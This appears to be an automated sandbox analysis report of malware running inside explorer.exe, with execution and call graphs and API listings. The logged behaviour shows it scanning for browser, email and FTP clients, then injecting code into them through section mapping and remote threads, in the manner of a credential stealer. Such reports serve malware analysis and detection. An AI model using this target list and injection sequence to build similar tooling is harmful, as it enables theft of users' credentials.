                                                                                                                          execution_graph 711 2a21000 712 2a21010 711->712 713 2a21007 711->713 715 2a21016 713->715 765 2a22608 VirtualQuery 715->765 718 2a21097 718->712 720 2a2102c RtlMoveMemory 721 2a21071 GetCurrentProcessId 720->721 722 2a2104d 720->722 726 2a21092 721->726 727 2a2109e 721->727 802 2a22861 GetProcessHeap RtlAllocateHeap 722->802 724 2a21052 RtlMoveMemory 724->721 726->718 729 2a21095 726->729 768 2a210a4 727->768 803 2a21332 729->803 730 2a210a3 732 2a22861 GetProcessHeap RtlAllocateHeap 730->732 733 2a210cc 732->733 734 2a210dc CreateToolhelp32Snapshot 733->734 735 2a21322 Sleep 734->735 736 2a210f0 Process32First 734->736 735->734 737 2a2131b CloseHandle 736->737 738 2a2110c lstrcmpiA 736->738 737->735 739 2a21124 lstrcmpiA 738->739 762 2a21280 738->762 741 2a21138 lstrcmpiA 739->741 739->762 740 2a225ad OpenProcess IsWow64Process IsWow64Process CloseHandle 740->762 742 2a2114c lstrcmpiA 741->742 741->762 744 2a21160 lstrcmpiA 742->744 742->762 743 2a21305 Process32Next 743->738 746 2a21319 743->746 745 2a21170 lstrcmpiA 744->745 744->762 747 2a21184 lstrcmpiA 745->747 745->762 746->737 748 2a21198 lstrcmpiA 747->748 747->762 749 2a211ac lstrcmpiA 748->749 748->762 750 2a211c0 lstrcmpiA 749->750 749->762 751 2a211d4 lstrcmpiA 750->751 750->762 752 2a211e8 lstrcmpiA 751->752 751->762 754 2a211fc lstrcmpiA 752->754 752->762 753 2a22608 VirtualQuery 753->762 755 2a2120c lstrcmpiA 754->755 754->762 757 2a2121c lstrcmpiA 755->757 755->762 756 2a212ae lstrcmpiA 756->762 758 2a2122c lstrcmpiA 757->758 757->762 759 2a2123c lstrcmpiA 758->759 758->762 761 2a2124c lstrcmpiA 759->761 759->762 760 2a21819 30 API calls 760->762 761->762 763 2a2125c lstrcmpiA 761->763 762->740 762->743 762->753 762->756 762->760 763->762 764 2a2126c lstrcmpiA 763->764 764->743 764->762 766 2a2101e 765->766 766->718 767 2a22861 GetProcessHeap RtlAllocateHeap 766->767 767->720 830 2a22861 GetProcessHeap RtlAllocateHeap 768->830 770 2a210cc 771 2a210dc CreateToolhelp32Snapshot 770->771 772 2a21322 Sleep 771->772 773 2a210f0 Process32First 771->773 772->771 774 2a2131b CloseHandle 773->774 775 2a2110c lstrcmpiA 773->775 774->772 776 2a21124 lstrcmpiA 775->776 799 2a21280 775->799 778 2a21138 lstrcmpiA 776->778 776->799 779 2a2114c lstrcmpiA 778->779 778->799 781 2a21160 lstrcmpiA 779->781 779->799 780 2a21305 Process32Next 780->775 783 2a21319 780->783 782 2a21170 lstrcmpiA 781->782 781->799 784 2a21184 lstrcmpiA 782->784 782->799 783->774 785 2a21198 lstrcmpiA 784->785 784->799 786 2a211ac lstrcmpiA 785->786 785->799 787 2a211c0 lstrcmpiA 786->787 786->799 788 2a211d4 lstrcmpiA 787->788 787->799 789 2a211e8 lstrcmpiA 788->789 788->799 791 2a211fc lstrcmpiA 789->791 789->799 790 2a22608 VirtualQuery 790->799 792 2a2120c lstrcmpiA 791->792 791->799 794 2a2121c lstrcmpiA 792->794 792->799 793 2a212ae lstrcmpiA 793->799 795 2a2122c lstrcmpiA 794->795 794->799 796 2a2123c lstrcmpiA 795->796 795->799 798 2a2124c lstrcmpiA 796->798 796->799 798->799 800 2a2125c lstrcmpiA 798->800 799->780 799->790 799->793 831 2a225ad OpenProcess 799->831 837 2a21819 799->837 800->799 801 2a2126c lstrcmpiA 800->801 801->780 801->799 802->724 883 2a22861 GetProcessHeap RtlAllocateHeap 803->883 805 2a21340 GetModuleFileNameA 884 2a22861 GetProcessHeap RtlAllocateHeap 805->884 807 2a21357 GetCurrentProcessId wsprintfA 885 2a2263e CryptAcquireContextA 807->885 810 2a2139c Sleep 890 2a224d5 GetCurrentProcessId GetCurrentThreadId CreateToolhelp32Snapshot Thread32First 810->890 811 2a2140d 908 2a22843 811->908 814 2a213ae GetModuleHandleA GetProcAddress 816 2a213da GetModuleHandleA GetProcAddress 814->816 817 2a213c9 814->817 820 2a21406 816->820 821 2a213f5 816->821 898 2a21de3 817->898 818 2a22843 3 API calls 822 2a2141b RtlExitUserThread 818->822 825 2a224d5 10 API calls 820->825 824 2a21de3 3 API calls 821->824 823 2a21425 822->823 826 2a22608 VirtualQuery 823->826 828 2a2144b 823->828 824->820 825->811 827 2a2143a 826->827 827->828 913 2a21493 827->913 828->727 830->770 832 2a22600 831->832 833 2a225cb IsWow64Process 831->833 832->799 834 2a225ee 833->834 835 2a225dc IsWow64Process 833->835 836 2a225f9 CloseHandle 834->836 835->834 835->836 836->832 838 2a22608 VirtualQuery 837->838 839 2a21833 838->839 840 2a21845 OpenProcess 839->840 841 2a21a76 839->841 840->841 842 2a2185e 840->842 841->799 843 2a22608 VirtualQuery 842->843 844 2a21865 843->844 844->841 845 2a21873 NtSetInformationProcess 844->845 846 2a2188f 844->846 845->846 868 2a21a80 846->868 849 2a21a80 2 API calls 850 2a218d6 849->850 851 2a21a73 CloseHandle 850->851 852 2a21a80 2 API calls 850->852 851->841 853 2a21900 852->853 874 2a21b17 853->874 856 2a21a80 2 API calls 857 2a21930 RtlMoveMemory RtlMoveMemory NtUnmapViewOfSection 856->857 858 2a21985 857->858 859 2a21a4e CreateRemoteThread 857->859 861 2a2198b CreateMutexA GetLastError 858->861 864 2a219bb GetModuleHandleA GetProcAddress ReadProcessMemory 858->864 860 2a21a65 CloseHandle 859->860 862 2a21a67 CloseHandle CloseHandle 860->862 861->858 863 2a219a7 CloseHandle Sleep 861->863 862->851 863->861 865 2a219ec WriteProcessMemory 864->865 867 2a21a47 864->867 866 2a21a16 CreateRemoteThread CloseHandle Sleep WriteProcessMemory 865->866 865->867 866->867 867->860 867->862 869 2a21a94 868->869 872 2a218b4 868->872 870 2a21ac3 869->870 871 2a21aa4 NtCreateSection 869->871 870->872 873 2a21ad8 NtMapViewOfSection 870->873 871->870 872->849 873->872 875 2a21b2e 874->875 881 2a21b60 874->881 876 2a21b30 RtlMoveMemory 875->876 876->876 876->881 877 2a21bc3 878 2a21be1 LdrProcessRelocationBlock 877->878 879 2a21910 NtUnmapViewOfSection 877->879 878->877 878->879 879->856 880 2a21b71 LoadLibraryA 880->879 880->881 881->877 881->880 882 2a21ba1 GetProcAddress 881->882 882->879 882->881 883->805 884->807 886 2a22664 CryptCreateHash lstrlen CryptHashData CryptGetHashParam 885->886 887 2a21384 CreateMutexA GetLastError 885->887 888 2a226aa wsprintfA 886->888 887->810 887->811 888->888 889 2a226cc CryptDestroyHash CryptReleaseContext 888->889 889->887 891 2a22515 890->891 892 2a22565 CloseHandle 891->892 893 2a22555 Thread32Next 891->893 894 2a22521 OpenThread 891->894 892->814 893->891 895 2a22544 ResumeThread 894->895 896 2a2253c SuspendThread 894->896 897 2a2254a CloseHandle 895->897 896->897 897->893 899 2a21e56 898->899 900 2a21ded 898->900 899->816 900->899 940 2a21e93 VirtualProtect 900->940 902 2a21e04 902->899 941 2a22815 VirtualAlloc 902->941 904 2a21e10 905 2a21e1a RtlMoveMemory 904->905 906 2a21e2d 904->906 905->906 942 2a21e93 VirtualProtect 906->942 909 2a22608 VirtualQuery 908->909 910 2a2284b 909->910 911 2a21414 910->911 912 2a2284f GetProcessHeap HeapFree 910->912 911->818 912->911 914 2a214c0 913->914 915 2a214a1 913->915 917 2a21510 914->917 918 2a214c8 914->918 943 2a217c7 915->943 962 2a226e6 lstrlen lstrlen 917->962 920 2a217c7 5 API calls 918->920 937 2a214b6 918->937 922 2a214e0 920->922 922->937 950 2a21647 922->950 923 2a2155f 924 2a226e6 2 API calls 923->924 927 2a2156c 924->927 925 2a21532 964 2a21752 GetModuleHandleA GetProcAddress 925->964 930 2a215a0 927->930 931 2a21584 927->931 927->937 933 2a22404 5 API calls 930->933 930->937 967 2a22404 lstrlen 931->967 936 2a215ac 933->936 934 2a21647 11 API calls 934->937 936->937 938 2a21647 11 API calls 936->938 937->828 939 2a214fb 938->939 939->937 973 2a215e0 939->973 940->902 941->904 942->899 944 2a217d1 943->944 945 2a21812 943->945 944->945 946 2a226e6 2 API calls 944->946 945->937 947 2a217f1 946->947 947->945 978 2a22861 GetProcessHeap RtlAllocateHeap 947->978 949 2a21804 RtlMoveMemory 949->945 951 2a21660 950->951 961 2a21745 950->961 952 2a21671 lstrlen 951->952 951->961 953 2a21683 lstrlen 952->953 952->961 954 2a21690 getpeername 953->954 953->961 955 2a216ae inet_ntoa htons 954->955 954->961 956 2a216cc 955->956 955->961 956->961 979 2a22861 GetProcessHeap RtlAllocateHeap 956->979 958 2a21717 wsprintfA 959 2a2173a 958->959 960 2a22843 3 API calls 959->960 959->961 960->961 961->939 963 2a2151d 962->963 963->923 963->925 965 2a21539 964->965 966 2a21776 RtlZeroMemory RtlZeroMemory RtlZeroMemory RtlZeroMemory 964->966 965->934 965->937 966->965 968 2a22456 967->968 969 2a2241c CryptStringToBinaryA 967->969 968->937 969->968 970 2a22438 969->970 980 2a22861 GetProcessHeap RtlAllocateHeap 970->980 972 2a22444 CryptStringToBinaryA 972->968 974 2a22843 3 API calls 973->974 975 2a215f5 974->975 976 2a22843 3 API calls 975->976 977 2a215fc 976->977 977->937 978->949 979->958 980->972 990 2a21eb6 991 2a21ed9 990->991 992 2a21ecc lstrlen 990->992 1001 2a22861 GetProcessHeap RtlAllocateHeap 991->1001 992->991 994 2a21ee1 lstrcat 995 2a21f16 lstrcat 994->995 996 2a21f1d 994->996 995->996 1002 2a21f4a 996->1002 999 2a22843 3 API calls 1000 2a21f40 999->1000 1001->994 1036 2a222b8 1002->1036 1006 2a21f77 1041 2a227e2 lstrlen MultiByteToWideChar 1006->1041 1008 2a21f86 1042 2a22374 RtlZeroMemory 1008->1042 1011 2a2229a 1013 2a22843 3 API calls 1011->1013 1012 2a21fd8 RtlZeroMemory 1014 2a2200d 1012->1014 1015 2a21f2d 1013->1015 1014->1011 1019 2a2203b 1014->1019 1044 2a222e5 1014->1044 1015->999 1017 2a22280 1017->1011 1018 2a22843 3 API calls 1017->1018 1018->1011 1019->1017 1053 2a22861 GetProcessHeap RtlAllocateHeap 1019->1053 1021 2a2210b wsprintfW 1022 2a22131 1021->1022 1026 2a2219e 1022->1026 1054 2a22861 GetProcessHeap RtlAllocateHeap 1022->1054 1024 2a2216b wsprintfW 1024->1026 1025 2a2225d 1027 2a22843 3 API calls 1025->1027 1026->1025 1055 2a22861 GetProcessHeap RtlAllocateHeap 1026->1055 1029 2a22271 1027->1029 1029->1017 1030 2a22843 3 API calls 1029->1030 1030->1017 1031 2a22256 1034 2a22843 3 API calls 1031->1034 1032 2a221e9 1032->1031 1056 2a22815 VirtualAlloc 1032->1056 1034->1025 1035 2a22243 RtlMoveMemory 1035->1031 1037 2a222c2 1036->1037 1039 2a21f69 1036->1039 1038 2a226e6 2 API calls 1037->1038 1038->1039 1040 2a22861 GetProcessHeap RtlAllocateHeap 1039->1040 1040->1006 1041->1008 1043 2a21f96 1042->1043 1043->1011 1043->1012 1046 2a222f2 1044->1046 1047 2a22353 1044->1047 1045 2a222f6 DnsQuery_W 1045->1046 1046->1045 1046->1047 1048 2a22335 DnsFree inet_ntoa 1046->1048 1047->1019 1048->1046 1049 2a22355 1048->1049 1057 2a22861 GetProcessHeap RtlAllocateHeap 1049->1057 1051 2a2235f 1058 2a227e2 lstrlen MultiByteToWideChar 1051->1058 1053->1021 1054->1024 1055->1032 1056->1035 1057->1051 1058->1047 1059 2a22806 VirtualFree 1060 2a21425 1061 2a21432 1060->1061 1062 2a2144b 1060->1062 1063 2a22608 VirtualQuery 1061->1063 1064 2a2143a 1063->1064 1064->1062 1065 2a21493 23 API calls 1064->1065 1065->1062 981 2a27728 982 2a2774b 981->982 986 2a27904 981->986 983 2a2785a LoadLibraryA 982->983 988 2a2789f VirtualProtect VirtualProtect 982->988 984 2a27871 983->984 984->982 987 2a27883 GetProcAddress 984->987 986->986 987->984 989 2a27899 987->989 988->986 1072 2a2245e lstrlen 1073 2a22476 CryptBinaryToStringA 1072->1073 1074 2a224a5 1072->1074 1073->1074 1075 2a22489 1073->1075 1078 2a22861 GetProcessHeap RtlAllocateHeap 1075->1078 1077 2a22494 CryptBinaryToStringA 1077->1074 1078->1077

                                                                                                                          Callgraph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          • Opacity -> Relevance
                                                                                                                          • Disassembly available
                                                                                                                          callgraph 0 Function_02A227E2 1 Function_02A21DE3 23 Function_02A21DC0 1->23 36 Function_02A21E93 1->36 41 Function_02A22815 1->41 45 Function_02A21E5D 1->45 2 Function_02A215E0 21 Function_02A22843 2->21 3 Function_02A22861 4 Function_02A230E1 5 Function_02A226E6 6 Function_02A210A4 6->3 12 Function_02A225AD 6->12 14 Function_02A22573 6->14 15 Function_02A22731 6->15 32 Function_02A22608 6->32 33 Function_02A22592 6->33 42 Function_02A21819 6->42 7 Function_02A21425 7->32 35 Function_02A21493 7->35 8 Function_02A222E5 8->0 8->3 9 Function_02A27728 10 Function_02A21469 10->32 10->35 11 Function_02A224AE 13 Function_02A21332 13->1 13->3 20 Function_02A2263E 13->20 13->21 13->32 13->35 40 Function_02A224D5 13->40 16 Function_02A21EB6 16->3 16->21 31 Function_02A21F4A 16->31 17 Function_02A22374 18 Function_02A230FB 19 Function_02A222B8 19->5 21->32 22 Function_02A21A80 43 Function_02A21C19 23->43 24 Function_02A21D80 24->43 25 Function_02A21000 37 Function_02A21016 25->37 26 Function_02A22841 27 Function_02A22806 28 Function_02A21647 28->3 28->11 28->21 29 Function_02A217C7 29->3 29->5 30 Function_02A22404 30->3 31->0 31->3 31->8 31->15 31->17 31->19 31->21 31->41 34 Function_02A21752 35->2 35->5 35->28 35->29 35->30 35->34 37->3 37->6 37->12 37->13 37->14 37->15 37->32 37->33 37->42 38 Function_02A21B17 39 Function_02A23417 42->22 42->32 42->38 44 Function_02A2245E 44->3 45->24

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 0 2a21016-2a21020 call 2a22608 3 2a21022-2a2104b call 2a22861 RtlMoveMemory 0->3 4 2a21097-2a21098 0->4 7 2a21071-2a21090 GetCurrentProcessId 3->7 8 2a2104d-2a2106b call 2a22861 RtlMoveMemory 3->8 12 2a21092-2a21093 7->12 13 2a2109e-2a210d7 call 2a210a4 call 2a22861 7->13 8->7 12->4 15 2a21095-2a21099 call 2a21332 12->15 22 2a210dc-2a210ea CreateToolhelp32Snapshot 13->22 15->13 23 2a21322-2a2132d Sleep 22->23 24 2a210f0-2a21106 Process32First 22->24 23->22 25 2a2131b-2a2131c CloseHandle 24->25 26 2a2110c-2a2111e lstrcmpiA 24->26 25->23 27 2a21280-2a21289 call 2a225ad 26->27 28 2a21124-2a21132 lstrcmpiA 26->28 33 2a21305-2a21313 Process32Next 27->33 34 2a2128b-2a21294 call 2a22592 27->34 28->27 30 2a21138-2a21146 lstrcmpiA 28->30 30->27 32 2a2114c-2a2115a lstrcmpiA 30->32 32->27 35 2a21160-2a2116a lstrcmpiA 32->35 33->26 37 2a21319 33->37 34->33 42 2a21296-2a2129d call 2a22573 34->42 35->27 36 2a21170-2a2117e lstrcmpiA 35->36 36->27 39 2a21184-2a21192 lstrcmpiA 36->39 37->25 39->27 41 2a21198-2a211a6 lstrcmpiA 39->41 41->27 43 2a211ac-2a211ba lstrcmpiA 41->43 42->33 48 2a2129f-2a212ac call 2a22608 42->48 43->27 45 2a211c0-2a211ce lstrcmpiA 43->45 45->27 47 2a211d4-2a211e2 lstrcmpiA 45->47 47->27 49 2a211e8-2a211f6 lstrcmpiA 47->49 48->33 54 2a212ae-2a21300 lstrcmpiA call 2a22731 call 2a21819 call 2a22731 48->54 49->27 51 2a211fc-2a2120a lstrcmpiA 49->51 51->27 53 2a2120c-2a2121a lstrcmpiA 51->53 53->27 55 2a2121c-2a2122a lstrcmpiA 53->55 54->33 55->27 57 2a2122c-2a2123a lstrcmpiA 55->57 57->27 59 2a2123c-2a2124a lstrcmpiA 57->59 59->27 61 2a2124c-2a2125a lstrcmpiA 59->61 61->27 64 2a2125c-2a2126a lstrcmpiA 61->64 64->27 65 2a2126c-2a2127a lstrcmpiA 64->65 65->27 65->33
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 02A22608: VirtualQuery.KERNEL32(02A24434,?,0000001C), ref: 02A22615
                                                                                                                            • Part of subcall function 02A22861: GetProcessHeap.KERNEL32(00000008,0000A000,02A210CC), ref: 02A22864
                                                                                                                            • Part of subcall function 02A22861: RtlAllocateHeap.NTDLL(00000000), ref: 02A2286B
                                                                                                                          • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 02A21038
                                                                                                                          • RtlMoveMemory.NTDLL(00000000,?,?), ref: 02A2106B
                                                                                                                          • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 02A21074
                                                                                                                          • GetCurrentProcessId.KERNEL32(?,02A21010), ref: 02A2107A
                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02A210DF
                                                                                                                          • Process32First.KERNEL32(00000000,?), ref: 02A210FE
                                                                                                                          • lstrcmpiA.KERNEL32(?,firefox.exe), ref: 02A2111A
                                                                                                                          • lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 02A2112E
                                                                                                                          • lstrcmpiA.KERNEL32(?,chrome.exe), ref: 02A21142
                                                                                                                          • lstrcmpiA.KERNEL32(?,opera.exe), ref: 02A21156
                                                                                                                          • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 02A21166
                                                                                                                          • lstrcmpiA.KERNEL32(?,outlook.exe), ref: 02A2117A
                                                                                                                          • lstrcmpiA.KERNEL32(?,thebat.exe), ref: 02A2118E
                                                                                                                          • lstrcmpiA.KERNEL32(?,thebat32.exe), ref: 02A211A2
                                                                                                                          • lstrcmpiA.KERNEL32(?,thebat64.exe), ref: 02A211B6
                                                                                                                          • lstrcmpiA.KERNEL32(?,thunderbird.exe), ref: 02A211CA
                                                                                                                          • lstrcmpiA.KERNEL32(?,filezilla.exe), ref: 02A211DE
                                                                                                                          • lstrcmpiA.KERNEL32(?,smartftp.exe), ref: 02A211F2
                                                                                                                          • lstrcmpiA.KERNEL32(?,winscp.exe), ref: 02A21206
                                                                                                                          • lstrcmpiA.KERNEL32(?,flashfxp.exe), ref: 02A21216
                                                                                                                          • lstrcmpiA.KERNEL32(?,cuteftppro.exe), ref: 02A21226
                                                                                                                          • lstrcmpiA.KERNEL32(?,mailmaster.exe), ref: 02A21236
                                                                                                                          • lstrcmpiA.KERNEL32(?,263em.exe), ref: 02A21246
                                                                                                                          • lstrcmpiA.KERNEL32(?,foxmail.exe), ref: 02A21256
                                                                                                                          • lstrcmpiA.KERNEL32(?,alimail.exe), ref: 02A21266
                                                                                                                          • lstrcmpiA.KERNEL32(?,mailchat.exe), ref: 02A21276
                                                                                                                          • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 02A212B4
                                                                                                                          • Process32Next.KERNEL32(00000000,00000128), ref: 02A2130B
                                                                                                                          • CloseHandle.KERNELBASE(00000000), ref: 02A2131C
                                                                                                                          • Sleep.KERNELBASE(000003E8), ref: 02A21327
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000018.00000002.2534825073.0000000002A21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A21000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_24_2_2a21000_explorer.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrcmpi$HeapMemoryMoveProcessProcess32$AllocateCloseCreateCurrentFirstHandleNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtual
                                                                                                                          • String ID: 0-gwP,gw$263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
                                                                                                                          • API String ID: 2555639992-1208099918
                                                                                                                          • Opcode ID: a9fcf3c78f685ff8069baeb17fce91bcb1d4428edb62954528d5b7ce963cba21
                                                                                                                          • Instruction ID: fef84dfcc07ddd3dceafefc1d96232d3f807296feca08ace463b479821f0b77a
                                                                                                                          • Opcode Fuzzy Hash: a9fcf3c78f685ff8069baeb17fce91bcb1d4428edb62954528d5b7ce963cba21
                                                                                                                          • Instruction Fuzzy Hash: 1D71A231A44325ABEF10DB7C9E84E7A7BADAF46780B050969F945D2041EF28D50E8F74

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 02A22861: GetProcessHeap.KERNEL32(00000008,0000A000,02A210CC), ref: 02A22864
                                                                                                                            • Part of subcall function 02A22861: RtlAllocateHeap.NTDLL(00000000), ref: 02A2286B
                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02A210DF
                                                                                                                          • Process32First.KERNEL32(00000000,?), ref: 02A210FE
                                                                                                                          • lstrcmpiA.KERNEL32(?,firefox.exe), ref: 02A2111A
                                                                                                                          • lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 02A2112E
                                                                                                                          • lstrcmpiA.KERNEL32(?,chrome.exe), ref: 02A21142
                                                                                                                          • lstrcmpiA.KERNEL32(?,opera.exe), ref: 02A21156
                                                                                                                          • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 02A21166
                                                                                                                          • lstrcmpiA.KERNEL32(?,outlook.exe), ref: 02A2117A
                                                                                                                          • lstrcmpiA.KERNEL32(?,thebat.exe), ref: 02A2118E
                                                                                                                          • lstrcmpiA.KERNEL32(?,thebat32.exe), ref: 02A211A2
                                                                                                                          • lstrcmpiA.KERNEL32(?,thebat64.exe), ref: 02A211B6
                                                                                                                          • lstrcmpiA.KERNEL32(?,thunderbird.exe), ref: 02A211CA
                                                                                                                          • lstrcmpiA.KERNEL32(?,filezilla.exe), ref: 02A211DE
                                                                                                                          • lstrcmpiA.KERNEL32(?,smartftp.exe), ref: 02A211F2
                                                                                                                          • lstrcmpiA.KERNEL32(?,winscp.exe), ref: 02A21206
                                                                                                                          • lstrcmpiA.KERNEL32(?,flashfxp.exe), ref: 02A21216
                                                                                                                          • lstrcmpiA.KERNEL32(?,cuteftppro.exe), ref: 02A21226
                                                                                                                          • lstrcmpiA.KERNEL32(?,mailmaster.exe), ref: 02A21236
                                                                                                                          • lstrcmpiA.KERNEL32(?,263em.exe), ref: 02A21246
                                                                                                                          • lstrcmpiA.KERNEL32(?,foxmail.exe), ref: 02A21256
                                                                                                                          • lstrcmpiA.KERNEL32(?,alimail.exe), ref: 02A21266
                                                                                                                          • lstrcmpiA.KERNEL32(?,mailchat.exe), ref: 02A21276
                                                                                                                          • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 02A212B4
                                                                                                                          • Process32Next.KERNEL32(00000000,00000128), ref: 02A2130B
                                                                                                                          • CloseHandle.KERNELBASE(00000000), ref: 02A2131C
                                                                                                                          • Sleep.KERNELBASE(000003E8), ref: 02A21327
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000018.00000002.2534825073.0000000002A21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A21000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_24_2_2a21000_explorer.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrcmpi$HeapProcess32$AllocateCloseCreateFirstHandleNextProcessSleepSnapshotToolhelp32
                                                                                                                          • String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
                                                                                                                          • API String ID: 3950187957-1680033604
                                                                                                                          • Opcode ID: 1d7ba66fde751b97d6e11d963116d1631495f3fa92756d5420264a82ec81a9b5
                                                                                                                          • Instruction ID: 20ceb17e01d443ba98b7b8b6f03c766e95116e725b6f340355927f1cb27e54ce
                                                                                                                          • Opcode Fuzzy Hash: 1d7ba66fde751b97d6e11d963116d1631495f3fa92756d5420264a82ec81a9b5
                                                                                                                          • Instruction Fuzzy Hash: 3651B331A44325A6EF10DBB88E84E7EBBACBF86784B050969F945C2041EF28D50D8F75

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 113 2a27728-2a27745 114 2a2774b-2a27758 113->114 115 2a2790d 113->115 116 2a2776a-2a2776f 114->116 115->115 117 2a27771 116->117 118 2a27773 117->118 119 2a27760-2a27765 117->119 120 2a27778-2a2777a 118->120 121 2a27766-2a27768 119->121 122 2a27783-2a27787 120->122 123 2a2777c-2a27781 120->123 121->116 121->117 122->120 124 2a27789 122->124 123->122 125 2a27794-2a27799 124->125 126 2a2778b-2a27792 124->126 127 2a2779b-2a277a4 125->127 128 2a277a8-2a277aa 125->128 126->120 126->125 129 2a277a6 127->129 130 2a2781a-2a2781d 127->130 131 2a277b3-2a277b7 128->131 132 2a277ac-2a277b1 128->132 129->128 133 2a27822-2a27825 130->133 134 2a277c0-2a277c2 131->134 135 2a277b9-2a277be 131->135 132->131 138 2a27827-2a27829 133->138 136 2a277e4-2a277f3 134->136 137 2a277c4 134->137 135->134 140 2a27804-2a27811 136->140 141 2a277f5-2a277fc 136->141 139 2a277c5-2a277c7 137->139 138->133 142 2a2782b-2a2782e 138->142 144 2a277d0-2a277d4 139->144 145 2a277c9-2a277ce 139->145 140->140 147 2a27813-2a27815 140->147 141->141 146 2a277fe 141->146 142->133 143 2a27830-2a2784c 142->143 143->138 148 2a2784e 143->148 144->139 149 2a277d6 144->149 145->144 146->121 147->121 150 2a27854-2a27858 148->150 151 2a277e1 149->151 152 2a277d8-2a277df 149->152 153 2a2785a-2a27870 LoadLibraryA 150->153 154 2a2789f-2a278a2 150->154 151->136 152->139 152->151 155 2a27871-2a27876 153->155 156 2a278a5-2a278ac 154->156 155->150 157 2a27878-2a2787a 155->157 158 2a278d0-2a27900 VirtualProtect * 2 156->158 159 2a278ae-2a278b0 156->159 161 2a27883-2a27890 GetProcAddress 157->161 162 2a2787c-2a27882 157->162 160 2a27904-2a27908 158->160 163 2a278b2-2a278c1 159->163 164 2a278c3-2a278ce 159->164 160->160 165 2a2790a 160->165 166 2a27892-2a27897 161->166 167 2a27899-2a2789c 161->167 162->161 163->156 164->163 165->115 166->155
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000018.00000002.2534825073.0000000002A26000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A26000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_24_2_2a26000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 5b80f05bef7a7aa034cf7512a4ba67a7beeaa29d56a755b7085c5317575d8332
                                                                                                                          • Instruction ID: fac84fb0184f7d515884a06c8cfbe810cf3917d7ac1c6e9995a0f77af8b047cc
                                                                                                                          • Opcode Fuzzy Hash: 5b80f05bef7a7aa034cf7512a4ba67a7beeaa29d56a755b7085c5317575d8332
                                                                                                                          • Instruction Fuzzy Hash: 625109719483A28FD7218B7CCCC07B1FBA0DB42220B190679C5E5CB3C6EB945A4DC7A1

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 168 2a22861-2a22871 GetProcessHeap RtlAllocateHeap
                                                                                                                          APIs
                                                                                                                          • GetProcessHeap.KERNEL32(00000008,0000A000,02A210CC), ref: 02A22864
                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02A2286B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000018.00000002.2534825073.0000000002A21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A21000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_24_2_2a21000_explorer.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Heap$AllocateProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1357844191-0
                                                                                                                          • Opcode ID: 9b13429a72a86bf26bfe63b90776a47729b33c5fa26480c8944fa06e707a7ab4
                                                                                                                          • Instruction ID: aac1a94b45f4490499c02a284610f2eaec4adb9b443fb296215d2b504a89eda7
                                                                                                                          • Opcode Fuzzy Hash: 9b13429a72a86bf26bfe63b90776a47729b33c5fa26480c8944fa06e707a7ab4
                                                                                                                          • Instruction Fuzzy Hash: 42A01270C841007FDD5417A8A80DF253A1AA742301F0108807209C40408D68805D8735

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 02A22608: VirtualQuery.KERNEL32(02A24434,?,0000001C), ref: 02A22615
                                                                                                                          • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,774CE800,microsoftedgecp.exe,?), ref: 02A2184E
                                                                                                                          • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 02A21889
                                                                                                                          • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 02A21919
